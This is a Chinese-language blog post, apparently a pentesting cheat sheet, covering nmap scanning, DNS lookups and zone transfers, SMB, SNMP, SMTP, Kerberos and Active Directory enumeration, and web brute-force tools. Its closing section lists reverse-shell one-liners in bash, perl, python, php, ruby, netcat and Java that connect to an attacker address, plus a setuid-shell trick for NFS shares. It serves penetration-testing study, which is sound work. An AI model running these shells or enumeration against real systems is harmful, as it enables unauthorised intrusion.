Marksec's Blog.

Pentesting备忘录(内容补充版)

字数统计: 11.4k阅读时长: 58 min
2019/05/07 Share


在先知上看见wing发的Pentesting备忘录,发现了好多比较好的命令和在实战中比较有用的命令,在看完后自己结合原版和中文版添加了一些拓展,让自己在回看的时候快速的回顾内容。同时发现原文的其他内容比较不错,后续也会跟随翻译一点。

NMAP

NMAP实用命令

1
2
3
4
5
6
7
8
9
10
快速扫描
nmap -T4 -F 192.168.169.105
SYN迅速扫描:(TCP两次握手,隐蔽性高)
nmap -sS -T4 -A -v cnblogs.com
UDP迅速扫描
nmap -sU -v 192.168.169.105
迅速扫描(NoPing)
nmap -T4 -A -v -Pn 192.168.169.105
快速扫描加强
nmap -sV -T4 -O -F --version-light 192.168.169.105

从Nmap Scan中提取实时IP

1
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

简单的端口扫描

1
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done

DNS lookups, Zone Transfers & Brute-Force

1
2
3
4
5
6
7
8
9
10
whois domain.com //whois 查询
dig {a|txt|ns|mx} domain.com //查询域名A记录,txt记录,域名解析记录,邮件记录
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com
dnsenum domain.com
nslookup -> set type=any -> ls -d domain.com
for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done

DIG用法简析

Dig(Domain Information Groper)是一个在类Unix命令行模式下查询DNS包括NS记录,A记录,MX记录等相关信息的工具。

DNS 命令输出格式

输入 dig www.baidu.com 命令,通常返回

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~# dig www.baidu.com

; <<>> DiG 9.11.4-P2-3-Debian <<>> www.baidu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19917 //status: NOERROR 表示查询没有什么错误
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION: // 表示需要查询的内容,这里需要查询域名的 A 记录
;www.baidu.com. IN A

;; ANSWER SECTION://ANSWER SECTION 表示查询结果,返回 A 记录的 IP 地址
www.baidu.com. 668 IN CNAME www.a.shifen.com.//668 表示本次查询缓存时间
www.a.shifen.com. 33 IN A 61.135.169.121 //权威 DNS 服务器
www.a.shifen.com. 33 IN A 61.135.169.125

;; Query time: 20 msec //Query time 表示查询完成时间
;; SERVER: 192.168.2.1#53(192.168.2.1) //表示本地 DNS 服务器地址和端口号
;; WHEN: Thu Apr 18 03:57:33 EDT 2019
;; MSG SIZE rcvd: 101

DNS 服务器记录类型

默认 dig rss.newyingyong.cn 返回的是 A 记录类型,其他类型还包括 MX、NS、SOA 等

(1)dig -t a www.weibo.com +noall +answer

1
2
3
4
5
6
7
8
9
10
root@kali:~# dig -t a www.weibo.com +noall +answer

; <<>> DiG 9.11.4-P2-3-Debian <<>> -t a www.weibo.com +noall +answer
;; global options: +cmd
www.weibo.com. 60 IN A 123.125.104.26
www.weibo.com. 60 IN A 123.125.104.197

其中 +noall +answer 表示返回简短信息,这里表示查询 A 记录。
注意,这里返回 2 个 A 记录,这相当于 DNS 均衡,比如浏览器客户端查询 www.weibo.com 域名得到两个 A 记录,然后连接其中的一个 IP 地址对应的 WEB 服务器,假如发现连接不上,可以使用另外一个地址连接。
比如在万网域名管理后台,可以给同一个域名添加两条 A 记录,相当于实现了域名负载均衡。

(2)dig -t ns weibo.com

注意假如用户输入 dig -t ns www.weibo.com 是查询不出 NS 任何记录的,原因在于只有一级域名(或者顶级域名)才有 NS 记录,通过 FQDN 是查询不出 NS 信息的,所以要输入 dig -t ns weibo.com ,返回:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@kali:~# dig -t ns weibo.com

; <<>> DiG 9.11.4-P2-3-Debian <<>> -t ns weibo.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25391
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;weibo.com. IN NS

;; ANSWER SECTION:
weibo.com. 833 IN NS ns3.sina.com.cn.
weibo.com. 833 IN NS ns4.sina.com.cn.
weibo.com. 833 IN NS ns4.sina.com.
weibo.com. 833 IN NS ns2.sina.com.cn.
weibo.com. 833 IN NS ns1.sina.com.cn.
weibo.com. 833 IN NS ns3.sina.com.

;; Query time: 24 msec
;; SERVER: 192.168.2.1#53(192.168.2.1)
;; WHEN: Thu Apr 18 04:18:26 EDT 2019
;; MSG SIZE rcvd: 162

微博的权威服务器是微博自己建立的,有 6 个名称和 IP 地址:

有这么多地址,主要是防止单点问题,比如某个 NS 服务器连接不上,可以连接其他 NS 服务器
上述的 NS IP 地址属于不同的运营商,不同的运营商可能会查询对应的 NS 服务器,原因就是加速查询。

(3)dig -t a www.baidu.com

1
2
3
4
www.baidu.com.		293	IN	CNAME	www.a.shifen.com.
www.a.shifen.com. 281 IN CNAME www.wshifen.com.
www.wshifen.com. 225 IN A 103.235.46.39
这里返回的 CNAME 表示查询 www.baidu.com 的信息其实是 www.a.shifen.com 返回的 A 记录。

(4)dig -t mx baidu.com

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# dig -t mx baidu.com

;; QUESTION SECTION:
;baidu.com. IN MX

;; ANSWER SECTION:
baidu.com. 1100 IN MX 10 mx.maillb.baidu.com.
baidu.com. 1100 IN MX 15 mx.n.shifen.com.
baidu.com. 1100 IN MX 20 mx1.baidu.com.
baidu.com. 1100 IN MX 20 mx50.baidu.com.
baidu.com. 1100 IN MX 20 jpmx.baidu.com.

返回 MX 记录,注意这里不能输入 dig -t mx www.baidu.com ,因为 MX 记录一般配置在一级域名下。

DNS 迭代查询的具体流程

对于客户端(比如浏览器)查询本地域名 DNS 信息的时候,是递归查询的方式。而本地 DNS 服务器为了获取到某个域名的 DNS 信息,会使用迭代的方式(一步步询问)。通过 dig +trace blog.newyingyong.cn 来进行了解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@kali:~# dig +trace www.marksec.org
;; Warning: Message parser reports malformed message packet.

; <<>> DiG 9.11.4-P2-3-Debian <<>> +trace www.marksec.org
;; global options: +cmd
. 243694 IN NS a.root-servers.net.
. 243694 IN NS b.root-servers.net.
. 243694 IN NS c.root-servers.net.
. 243694 IN NS d.root-servers.net.
. 243694 IN NS e.root-servers.net.
. 243694 IN NS f.root-servers.net.
. 243694 IN NS g.root-servers.net.
. 243694 IN NS h.root-servers.net.
. 243694 IN NS i.root-servers.net.
. 243694 IN NS j.root-servers.net.
. 243694 IN NS k.root-servers.net.
. 243694 IN NS l.root-servers.net.
. 243694 IN NS m.root-servers.net.
;; Received 512 bytes from 192.168.2.1#53(192.168.2.1) in 55 ms//本地服务器查询

org. 172800 IN NS d0.org.afilias-nst.org.
org. 172800 IN NS b0.org.afilias-nst.org.
org. 172800 IN NS b2.org.afilias-nst.org.
org. 172800 IN NS a0.org.afilias-nst.info.
org. 172800 IN NS c0.org.afilias-nst.info.
org. 172800 IN NS a2.org.afilias-nst.info.
org. 86400 IN DS 9795 7 1 364DFAB3DAF254CAB477B5675B10766DDAA24982
org. 86400 IN DS 9795 7 2 3922B31B6F3A4EA92B19EB7B52120F031FD8E05FF0B03BAFCF9F891B FE7FF8E5
org. 86400 IN RRSIG DS 8 1 86400 20190501050000 20190418040000 25266
;; Received 817 bytes from 192.36.148.17#53(i.root-servers.net) in 58 ms//cn服务器查询

marksec.org. 86400 IN NS dns10.hichina.com.
marksec.org. 86400 IN NS dns9.hichina.com.
h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN NSEC3 1 1 1 D399EAAB H9PARR669T6U8O1GSG9E1LMITK4DEM0T NS SOA RRSIG DNSKEY NSEC3PARAM
h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN RRSIG NSEC3 7 2 86400 20190509082640 20190418072640
kj8622o9iq7ec42rj4grq506j1qagjkq.org. 86400 IN NSEC3 1 1 1 D399EAAB KJ8FDV3C6J6J757NJ1F1PP9C9IDUH76A NS DS RRSIG
kj8622o9iq7ec42rj4grq506j1qagjkq.org. 86400 IN RRSIG NSEC3 7 2 86400 20190508152516 20190417142516

;; Received 587 bytes from 199.19.57.1#53(d0.org.afilias-nst.org) in 113 ms //github服务器查询

www.marksec.org. 600 IN CNAME markhacker.github.io.
;; Received 78 bytes from 106.11.211.56#53(dns10.hichina.com) in 11 ms

DNS 缓存

假如 DNS 服务器每次都需要迭代或递归查询上一级的 DNS 服务器,那么 DNS 可能就不堪重负,考虑到域名的 DNS 信息不会频繁的修改,所以每一级中的 DNS 服务器都会缓存结果(包括浏览器这样的客户端也会缓存 DNS 结果)。
缓存带来的弊端可能就是 DNS 信息可能不是最新的,比如某个域名管理员修改了某个域名的 A 记录,由于每一级的 DNS 服务器都有缓存,所以最后客户端拿到的结果不是最新的,为了获取到最新的结果,可以直接向权威域名服务器进行信息查询。
比如 blog.rss.newyingyong.cn 的域名是由 dns9.hichina.com.(106.11.211.55)管理的,可以直接通过 dig @106.11.211.55 -t a baidu.com 或者 dig @dns9.hichina.com -t a baidu.com 获取最新 A 记录。
另外你也可以不查询本地 DNS 服务器获取信息,比如可以使用 8.8.8.8 Google Public DNS 进行查询,dig @8.8.8.8 -t a baidu.com 。

参考链接:https://www.jianshu.com/p/71f61652ec23

Banner抓取

1
2
3
nc -v $TARGET 80
telnet $TARGET 80
curl -vX $TARGET

netcat

netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
测试环境
Kali 192.168.2.10
Windows 192.168.2.12

聊天
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444

正向shell
Windows nc -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.2.12 4444

反向shell
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444 -e /bin/bash

文件传输
Windows nc -nlvp 4444 > incoming.exe
Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe

ncat

Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:

1
2
Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux ncat -nv 192.168.2.12 4444 --ssl

参考链接:https://bbs.pediy.com/thread-222364.htm

NFS共享

列出NFS导出的共享文件,如果RW和no_root_squash存在,那就直接上传Sid-Shell执行。

1
2
showmount -e 192.168.110.102
chown root:root sid-shell; chmod +s sid-shell

Kerberos域用户名枚举

kerberos主要是用来做网络通信时候的身份认证,在域里可以利用Kerberos响应来识别有效或无效的域帐户。目前使用的工具第一种是独立的Java工具Krbguess,第二种是用于nmap的krb5-enum-users NSE脚本。

Krbguess

1
2
用法:
Java -jar kerbguess.jar -r [domain] -d [用户列表] -s [DC IP ]

Nmap krb5-enum-users NSE脚本

1
2
用法:
Nmap -p 88 -script-args krb5-enum-users.realm ='[domain]',userdb = [user list] [DC IP]

Metasploit模块

auxiliary/gather/kerberos_enumusers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options
Module options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line

msf5 auxiliary(gather/kerberos_enumusers) > set domain mydoamin
domain => mydoamin
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf5 auxiliary(gather/kerberos_enumusers) > set user_file /job/users.txt
user_file => /job/users.txt

参考链接:https://www.attackdebris.com/?p=311

HTTP Brute-Force & Vulnerability Scanning

暴力和漏洞扫描常用工具:

1
2
3
4
5
target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

tee命令用于将数据重定向到文件,另一方面还可以提供一份重定向数据的副本作为后续命令的stdin。简单的说就是把数据重定向到给定文件和屏幕上。

gohuster

Linux默认安装的一款暴力扫描工具。它是使用Go语言编写的命令行工具,具备优异的执行效率和并发性能。该工具支持对子域名和Web目录进行基于字典的暴力扫描。不同于其他工具,该工具支持同时多扩展名破解,适合采用多种后台技术的网站。实施子域名扫描时,该工具支持泛域名扫描,并允许用户强制继续扫描,以应对泛域名解析带来的影响。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
-P string:基本AUTH的密码(仅为DIR模式)
-U string:基本AUTH的用户名(仅为DIR模式)
-a string:设置用户代理字符串(DIR模式)
-c string:用于请求的Cookie(仅为DIR模式)
-cn:显示CNNEX记录(DNS模式),不能与“-I”选项一起使用)
-e:扩展模式,打印完整URL
-f:向每个目录请求追加前斜线(仅为DIR模式)
-fw:当通配符发现时,强制继续操作
-i:显示IP地址(仅DNS模式)
-k:跳过SSL证书验证
-l:包括在输出中的主体长度(仅为DIR模式)
-m string:目录/文件模式(DIR)或DNS模式(DNS)(默认“DIR”)
-n:不要打印状态代码
-np:不显示进度
-o string:输出文件以写入结果(默认为STDUT)
-p string:用于请求的代理[http(s)://主机:端口](仅dir模式)
-q:不要打印横幅和其他噪音
-r:追随重定向
-s string:设置状态码(DIR模式)(默认"200,204,301,302,307,403")
-t int:并发线程数(默认值10)
-to duration:HTTP超时(仅限于DIR模式)(默认10s)
-u string:目标URL或域
-v:冗长输出(错误)
-w string:暴力猜解的单词列表的路径
-x string:要搜索的文件扩展(仅限于DIR模式)

eg:

1
2
gobuster -u <http://www.xxx.cn/> -t 20 -w /root/扫描目录.txt -s 200,301,302,401,403
-x html,htm,asp

wpscan

options

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
u 枚举用户名,默认从1-10

u[10-20] 枚举用户名,配置从10-20

p 枚举插件

vp 只枚举有漏洞的插件

ap 枚举所有插件,时间较长

tt 列举缩略图相关的文件

t 枚举主题信息

vt 只枚举存在漏洞的主题

at 枚举所有主题,时间较长

可以指定多个扫描选项,例:"-e tt,p"

如果没有指定选项,默认选项为:"vt,tt,u,vp"

--exclude-content-based "<regexp or string>"

当使用枚举选项时,可以使用该参数做一些过滤,基于正则或者字符串,可以不写正则分隔符,但要用单引号或双引号包裹

--config-file | -c <config file使用指定的配置文件

--user-agent | -a <User-Agent指定User-Agent

--cookie <String指定cookie

--random-agent | -r 使用随机User-Agent

--follow-redirection 如果目标包含一个重定向,则直接跟随跳转

--batch 无需用户交互,都使用默认行为

--no-color 不要采用彩色输出

--wp-content-dir <wp content dirWPScan会去发现wp-content目录,用户可手动指定

--wp-plugins-dir <wp plugins dir指定wp插件目录,默认是wp-content/plugins

--proxy <[protocol://]host:port设置一个代理,可以使用HTTP、SOCKS4、SOCKS4A、SOCKS5,如果未设置默认是HTTP协议

--proxy-auth <username:password设置代理登陆信息

--basic-auth <username:password设置基础认证信息

--wordlist | -w <wordlist指定密码字典

--username | -U <username指定爆破的用户名

--usernames <path-to-file指定爆破用户名字典

--threads | -t <number of threads指定多线程

--cache-ttl <cache-ttl设置 cache TTL

--request-timeout <request-timeout请求超时时间

--connect-timeout <connect-timeout连接超时时间

--max-threads <max-threads最大线程数

--throttle <milliseconds当线程数设置为1时,设置两个请求之间的间隔

--help | -h 输出帮助信息

--verbose | -v 输出Verbose

--version 输出当前版本

使用用法

1
2
3
4
wpscan --url [wordpress url]   //扫描WordPress漏洞
wpscan --url https://www.xxxxxxx.wiki/ --enumerate u //枚举用户
wpscan --url www.xxx.com --enumerate ap //扫描所有插件
wpscan --url www.xxx.com --enumerate vp //扫描容易受攻击的插件

whatweb

Whatweb是一个基于Ruby语言的开源网站指纹识别软件,正如它的名字一样,whatweb能够识别各种关于网站的详细信息包括:CMS类型、博客平台、中间件、web框架模块、网站服务器、脚本类型、JavaScript库、IP、cookie等等。

1
2
3
4
5
6
7
8
9
10
11
whatweb http://baidu.com or 192.168.1.1/24    //扫描网站或者网段
whatweb –input-file=/root/桌面/123.txt //导入txt进行扫描
whatweb -i ‘/root/桌面/123.txt’ //同上
whatweb 192.168.159.1 –log-xml=result.xml //将扫描结果导入文件(result.xml)
whatweb -v 192.168.1.1 //详细列出ip的扫描内容
whatweb 112.125.93.227/24 –url-suffix=”:8080″ //添加端口
whatweb -a 3 http://ndsec.doone.com.cn/forum.php //探测强度等级为3
whatweb -v –proxy-user admin:passwoed www.dvwa.com/login.php //–proxy-user admin:password //通过–proxy-user的方式可以指定用户名和密码进行探测
whatweb -v -c=’PHPSESSID=031a6d42fac3bdce24bf4dc02accd080; security=low’ http://www.dvwa.com/login.php //通过-c参数指定cookie的值
whatweb -l //使用-l参数可以列出插件的列表,包括插件的名称以及插件的描述
whatweb –info-plugins=”YouTube” //通过如上参数可以查看具体插件的内容

参考链接:https://www.freebuf.com/column/152611.html

RPC/NetBios/SMB

1
2
3
4
5
6
7
8
9
10
rpcinfo -p $TARGET
nbtscan $TARGET

#list shares
smbclient -L //$TARGET -U ""

# null session
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET

RPC

Sun RPC(远程过程调用)是一种Unix协议,用来实现多种服务比如NFS。最初由Sun开发,但现在广泛使用在其他平台上(包括Digital Unix的)。也被称为开放式网络计算(ONC)。

Sun RPC包带有一个RPC编译器,自动生成服务端和客户端的存根。

nmap带有将近600个RPC程序的数据库。许多RPC服务使用高端口编号或者使用UDP协议,RPC程序还有严重的远程利用漏洞。所以网络管理员和安全审计人员往往希望了解更多在他们的网络内有关任何RPC程序。

rpc简介https://www.jianshu.com/p/2accc2840a1b

smbclient

之前我有写过关于smbclient

相关链接https://www.marksec.org/2019/04/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B9%8Bsmbclient%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/

enum4linux

num4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等。该工具主要是针对Windows NT/2000/XP/2003,在Windows 7/10系统,部分功能受限。总的来说,一个工具可以获取这么多的信息,也算非常强大了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# enum4linux 192.168.199.114
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr 20 10:04:53 2019
==========================
| Target Information |
==========================
Target ........... 192.168.199.114
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.199.114 |
=======================================================
[E] Can't find workgroup/domain
===============================================
| Nbtstat Information for 192.168.199.114 |
===============================================
Looking up status of 192.168.199.114
No reply from 192.168.199.114
========================================
| Session Check on 192.168.199.114 |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

之后如果发现可以与smbclient配合食用,具体链接:https://www.cnblogs.com/bmjoker/p/9174804.html

SNMP

metasploit

用于SNMP auxiliary/scanner/snmp/snmp_login

设置一下参数并运行,可以看到Metasploit成功运行,在Community String中显示”mike”

Medusa

1
2
medusa -h 192.168.131.135 -u admin -P Desktop/demo/wordlist -M snmp
没有-u admin 但medusa需要,我们给赋个值

同样的,Medusa发现了值wei”mike”的字符串

onesixtyone

Onesoxtyone工具,它还试图使用基于字典的尝试猜测/破解SNMP社区字符串,正如我们在下面看到的,它已经确定了“mike”是有效的字符串

snmpwalk

snmpwalk用来查看支持SNMP协议的设备的一些信息,如cisco交换机或路由器IP地址等,也可用来协助开发SNMP功能。我们已经将”mike”作为Community字符串了,现在我们将其传递给SNMPWALK工具,然后将目标IP作为目标。这将从SNMP服务中提取所有可能的信息。

下面的MIB值对应于特定的MicrosoftWindows SNMP参数

1
2
3
4
5
6
7
1.3.6.1.2.1.25.1.6.0系统进程
1.3.6.1.2.1.25.4.2.1.2运行程序
1.3.6.1.2.1.25.4.2.1.4流程路径
1.3.6.1.2.1.25.2.3.1.4存储单元
1.3.6.1.2.1.25.6.3.1.2软件名称
1.3.6.1.4.1.77.1.2.25用户帐户
1.3.6.1.2.1.6.13.1.3 TCP 本地端口
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
利用snmpwalk查看公共的信息
# Windows User Accounts
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25 // 得到取得windows端的系统进程用户数等

# Windows Running Programs
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2

# Windows Hostname
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5

# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1

# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27

# Windows TCP Ports
snmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3

# Software Name
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2

# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt

snmp-check $TARGET

更多参考链接:https://www.freebuf.com/column/144144.html

SMTP

1
2
3
4
5
SMTP命令	    命令功能
MAIL FROM 命令中指定的地址是发件人地址
RCPT TO 标识单个的邮件接收人;可有多个 RCPT TO;常在 MAIL FROM命令后面
VRFY 用于验证指定的用户/邮箱是否存在;由于安全方面的原因,服务器常禁止此命令
EXPN 验证给定的邮箱列表是否存在,扩充邮箱列表,也常被禁用

smtp-user-enum

smtp-user-enum是kali自带的枚举工具,通过上述三个命令来枚举SMTP服务的用户帐户(sendmail)。

参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

Usage: smtp-user-enum [options] ( -u username | -U file-of-usernames ) ( -t host | -T file-of-targets )
options:
-m <number> 最大线程数(默认: 5)
-M <mode> 使用方法方式 EXPN, VRFY or RCPT (默认: VRFY)
-u <user> 指定用户
-f <addr> 邮箱地址,只能用在 "RCPT TO" mode (默认: user@example.com)
-D <domaim> 使用电子邮件地址添加到用户列表在域 (默认: none)使用邮箱代替用户名,比如:"-D example.com"域来使用代替testA@example.com, testB@example.com
-U <file> 通过smtp服务指定文件里的用户名检查
-t <host> 指定主机来运行smtp服务器主机服务
-T <file> 指定文件来运行smtp服务器主机服务
-p <port> 设置TCP端口号 (默认: 25)
-d 调试
-t <time> 最大返回时间 (default: 5)
-v 版本
-h 帮助

可以参考 smtp-user-enum-user-docs.pdf 文档,
Examples:
root@kali:~$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
root@kali:~$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
root@kali:~$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
root@kali:~$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
root@kali:~$ smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150

metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts.

msf auxiliary(scanner/smtp/smtp_enum) > set rhosts 202.38.193.203
rhosts => 202.38.193.203
msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 202.38.193.203:25 - 202.38.193.203:25 Banner: 220 mxt.scut.edu.cn ESMTP Postfix
[+] 202.38.193.203:25 - 202.38.193.203:25 Users found: adm, avahi, avahi-autoipd, bin, daemon, fax, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, news, nobody, operator, postgres, postmaster, root, sshd, sync, uucp, webmaster, www
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nmap脚本

nmap有扫描脚本smtp-enum-users.nse

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -p 25 --script smtp-enum-users.nse 202.38.193.203
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-24 10:23 CST
Nmap scan report for news.scut.edu.cn (202.38.193.203)
Host is up (0.054s latency).

PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test

Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds

参考链接:http://www.lemurs.me/2018/08/23/smtp-user-enum/

Active Directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# current domain info //当前域信息
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# domain trusts //域信任
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# current forest info //当前林信息
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# get forest trust relationships //林信任信息
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

# get DCs of a domain //列出域所有DC
nltest /dclist:offense.local
net group "domain controllers" /domain

# get DC for currently authenticated session //拿到DC当前的认证信息
nltest /dsgetdc:offense.local

# get domain trusts from cmd shell //cmd里得到信任域信息
nltest /domain_trusts

# get user info //得到用户信息
nltest /user:"spotless"

# get DC for currently authenticated session //得到当前经过身份认证的DC
set l

# whoami on older Windows systems //获得用户信息
set u

Gaining Access

shell反弹

shell反弹原理:

1
2
https://xz.aliyun.com/t/2548
https://xz.aliyun.com/t/2549

在本机执行nc -lvp 1234

Bash

1
2
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5|while read line;do $line >&5 2>&1;done

Perl

1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Nc

1
2
nc -e /bin/sh 192.168.146.129 2333
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.129 2333 >/tmp/f

URL-Encoded Perl: Linux

1
echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat without -e #1

1
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Netcat without -e #2

1
2
nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444

Java

1
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();

XTerm

1
2
3
4
5
6
7
8
